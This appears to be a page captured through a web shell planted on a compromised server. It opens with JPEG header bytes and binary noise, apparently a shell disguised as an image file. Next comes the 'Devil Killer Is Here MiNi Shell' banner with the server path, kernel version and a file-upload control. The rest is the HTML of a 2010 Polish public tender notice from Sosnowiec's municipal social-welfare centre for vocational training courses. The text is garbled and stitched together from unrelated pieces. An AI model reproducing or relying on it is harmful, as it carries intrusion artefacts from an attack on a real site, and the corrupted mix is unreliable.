JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101005/274239-N-2010.html

<p class="kh_header"><b>Sosnowiec: Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1., Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki - 14 Zadań</b><br>
<b>Numer ogłoszenia: 274239 - 2010; data zamieszczenia: 05.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Sosnowcu , ul. Mościckiego 14, 41-200 Sosnowiec, woj. śląskie, tel. 032 3680601, faks 032 3680614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopssosnowiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1., Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki - 14 Zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest realizacja usług obejmujących:
Organizację i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1., Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki - 14 Zadań
2.Adresaci zadania:
2.1.	Adresatami zadania są osoby bezrobotne, nieaktywne zawodowo, zatrudnione, będące w wieku aktywności zawodowej, korzystające z pomocy społecznej, zagrożone wykluczeniem społecznym.
2.2.Kursy przyuczające do zawodu obejmują:
2.2.1. Zajęcia teoretyczne i praktyczne, mające na celu uzyskanie przez uczestników nowych kwalifikacji zawodowych, zmianę lub uzupełnienie posiadanych kwalifikacji zawodowych. Kursy kończyć się będą egzaminem wewnętrznym lub zewnętrznym 
w zależności od specyfiki danego kursu zawodowego. Uczestnicy którzy ukończą wyznaczony kurs przyuczający do zawodu zgodnie z regulaminem uczestnictwa 
w projekcie Moda na sukces-czyli kroki w samodzielność otrzymają  zaświadczenie 
i certyfikat. 
Zaświadczenia winny być zgodne z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 
3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31, poz.216).
Szczegółowy opis przedmiotu zamówienia zamieszczono w załącznikach do SIWZ:
Załącznik nr 1a - Zadanie 1 - Kelner, barman dla maksymalnie 1 osoby 
Załącznik nr 1b - Zadanie 2 - Kosmetyka - wizaż i stylizacja dla maksymalnie 2 osób
Załącznik nr 1c - Zadanie 3 - Nowoczesne techniki wykończenia wnętrz dla maksymalnie 1 osoby
Załącznik nr 1d - Zadanie 4 - Opiekun osób starszych dla maksymalnie 7 osób
Załącznik nr 1e - Zadanie 5 - Florystyka + kasa fiskalna dla maksymalnie 9 osób
Załącznik nr 1f - Zadanie 6 - Kadry i płace dla maksymalnie 4 osób
Załącznik nr 1g - Zadanie 7 - Pracownik magazynu - hurtowni dla maksymalnie 2 osób
Załącznik nr 1h - Zadanie 8 - Opiekun dla dzieci dla maksymalnie 3 osób
Załącznik nr 1i - Zadanie 9 - Stylizacja paznokci dla maksymalnie 8 osób.
Załącznik nr 1j - Zadanie 10 - Kasjer sprzedawca + kasa fiskalna dla maksymalnie 11 osób 
Załącznik nr 1k - Zadanie 11-Tworzenie stron internetowych z elementami grafiki komputerowej dla maksymalnie 1 osoby.
Załącznik nr 1l - Zadanie 12 - Obsługa wózka widłowego dla maksymalnie 4 osób.
Załącznik nr 1ł - Zadanie 13 - Uprawnienia SEP do 1 KV dla maksymalnie 1 osoby.
Załącznik nr 1m - Zadanie 14 - Obsługa kasy fiskalnej + książeczka zdrowia dla maksymalnie  5 osób..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadań od 1 do 14
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, 
o których mowa w art.  22 ust. 1  ustawy Prawo zamówień publicznych. 
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadań od 1 do 14
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, 
o których mowa w art.  22 ust. 1  ustawy Prawo zamówień publicznych. 
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadań od 1 do 14
Wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych 	wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie 	dysponowania tymi zasobami. Zamawiający żąda wykazania, iż Wykonawca dysponuje salami szkoleniowymi, w których będą prowadzone zajęcia teoretyczne oraz miejscami przeznaczonymi na prowadzenie zajęć praktycznych w ilości i w jakości odpowiedniej do potrzeb określonego kursu, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki.  Sale winny być:
a) przystosowane pod względem sanitarnym, przeciwpożarowym, oświetleniowym, akustycznym  i  bhp do prowadzenia szkoleń,
b) wyposażone w odpowiednią liczbę miejsc siedzących i stolików,
c) wyposażone w odpowiednie oprzyrządowanie techniczne tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart, itp.
d) oznakowane zgodnie z wytycznymi (dostępne na stronie internetowej http://efs.silesia-region.pl zakładka Promocja).
 Miejsca przeznaczone do prowadzenia zajęć praktycznych winny być:
a) przystosowane pod względem przeciwpożarowym, 	oświetleniowym i bhp do prowadzenia zajęć praktycznych w zakresie poszczególnych rodzajów kursów,
b) wyposażone w odpowiednie oprzyrządowanie techniczne w zakresie poszczególnych rodzajów kursów,
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty wykazu metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadań od 1 do 14:
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami tj.: Zamawiający żąda wykazania, iż: 
- w zakresie realizacji zajęć teoretycznych Wykonawca dysponuje: co najmniej 1 osobą  posiadającą wykształcenie wyższe lub średnie oraz kwalifikacje do prowadzenia danego  rodzaju kursu przyuczającego do zawodu jak również minimum roczną praktykę w prowadzeniu danego kursu 
oraz 
- w zakresie realizacji zajęć praktycznych Wykonawca dysponuje: co najmniej 1 osobą  posiadającą wykształcenie wyższe lub średnie oraz kwalifikacje do prowadzenia danego  rodzaju kursu przyuczającego do zawodu jak również minimum roczną praktykę w prowadzeniu danego kursu. 
Zamawiający dopuszcza, aby Wykonawca dysponował 1 osobą spełniającą ww. warunki, która będzie realizowała zamówienie w zakresie zarówno zajęć teoretycznych jak i praktycznych. 
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty wykazu metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadań od 1 do 14
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, 
o których mowa w art.  22 ust. 1  ustawy Prawo zamówień publicznych. 
Ocena spełniania niniejszego warunku będzie oceniana na podstawie załączonego do oferty oświadczenia metodą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo -  wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniona jest osoba inna niż wskazane w aktualnym odpisie z właściwego rejestru. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załączone do oferty w oryginale.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od daty powzięcia wiadomości o tych okolicznościach.
2.  W przypadku, o którym mowa w ust. 1 Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
3. 	Zakazuje się wprowadzania istotnych zmian w umowie z naruszeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych, z zastrzeżeniem ust. 4.
4. Zamawiający przewiduje możliwość zmiany umowy w formie pisemnej pod rygorem nieważności tylko w sytuacji:
1) zmiany miejsca przeprowadzenia kursu  lub miejsc przeznaczonych na prowadzenie zajęć praktycznych
2) zmiany pracowników odpowiedzialnych za realizację umowy wskazanych w § 6 ust. 1 i ust. 2 umowy,
3) zmiany harmonogramu zajęć w tym godzin rozpoczęcia i/lub zakończenia zajęć,
4) zmiany osób posiadających uprawnienia, odpowiednie kwalifikacje i warunki do należytego wykonania zamówienia,
5) zmiany terminu rozpoczęcia i/lub zakończenia kursu z przyczyn leżących po stronie Wykonawcy, Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.sosnowiec.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Mościckiego 14
41-200 Sosnowiec
Dział Zamówień Publicznych III piętro, pokój 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2010 godzina 11:30, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Mościckiego 14
41-200 Sosnowiec
Kancelaria - piętro IV, pokój 422.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT MODA NA SUKCES - CZYLI KROKI W SAMODZIELNOŚĆ WSPÓŁFINANSOWANY ZE ŚRODKÓW UNII EUROPEJSKIEJ Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO W RAMACH PRIORYTETU VII DZIAŁANIE 7.1. PODDZIAŁANIA 7.1.1. PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Kelner, barman.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 1 - Kelner, barman
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 120 godzin w tym teoria - 40 godzin tj.: 4 kolejne tygodnie.
2.Tematy zajęć:2.1.Przygotowanie bufetu do pracy - 4 godziny.
2.2.Ocena jakości oferowanych towarów handlowych, surowców, półproduktów i wyrobów 
kulinarnych oraz ich przechowywanie w odpowiednich warunkach - 2 godziny teorii, 2 godziny
praktyki.
2.3.Sporządzanie dań gorących, przekąsek, sałatek i deserów, porcjowanie i dekorowanie 
serwowanych dań i napojów - 6 godzina teorii, 19 godzin praktyki.
2.4.Sporządzanie napojów mieszanych alkoholowych i bezalkoholowych z zastosowaniem różnych 
technik i narzędzi wg receptur krajowych i zagranicznych oraz własnych przepisów, parzenie 
kawy i herbaty - 3 godziny teorii, 24 godziny praktyki.
2.5.Obsługa maszyn, urządzeń i drobnego sprzętu niezbędnego do przygotowania, przechowywania
oraz wydawania potraw i napojów - 8 godzin praktyki.
2.6.Bezpośrednia obsługa konsumenta przy bufecie oraz wydawanie zamówionych potraw i 
napojów kelnerom - 5 godzin praktyki.
2.7.Doradzanie konsumentowi w zakresie wyboru potraw i napojów - 1 godzina teorii, 
1 godzina praktyki.
2.8.Sporządzanie dziennych raportów i rozliczeń materiałowych i finansowych - 2 godziny 
teorii, 4 godziny praktyki.
2.9.Układanie kart menu oraz kart win i wódek - 4 godziny teorii, 4 godziny praktyki.
2.10.Utrzymanie porządku i czystości na stanowisku pracy oraz przestrzeganie wymogów 
sanitarnych i bhp - 5 godzin teorii.
2.11.Zapoznanie z zasadami savoir-vivre u - 5 godzin teorii.
2.12.Obsługa kas fiskalnych 13 godzin praktyki.
2.13.Zasady HACCP - 8 godzin teorii.
3.Liczba uczestników - maksymalnie 1 osoba..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 -  Kosmetyka - wizaż i stylizacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 2 - Kosmetyka - wizaż i stylizacja.
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 120 godzin w tym teoria  - 40 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć:
2.1.Dermatologia - 18 godzin,
2.2.Kosmetyka naturalna i kosmetologia - 8 godzin teorii, 10 godzin praktyki,
2.3.BHP w gabinecie kosmetycznym - 5 godzin,
2.4.Masaż kosmetyczny - 5 godzin teorii, 15 godzin praktyki,
2.5.Makijaż (wizaż) - 4 godziny teorii, 10 praktyki,
2.6.Zabiegi stosowane w gabinecie kosmetycznym - 25 godzin praktyki,
2.7.Stylizacja, dobór, ubrań, makijażu - 20 godzin praktyki.
3.Liczba uczestników- maksymalnie 2 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Nowoczesne techniki wykończenia wnętrz.</p>
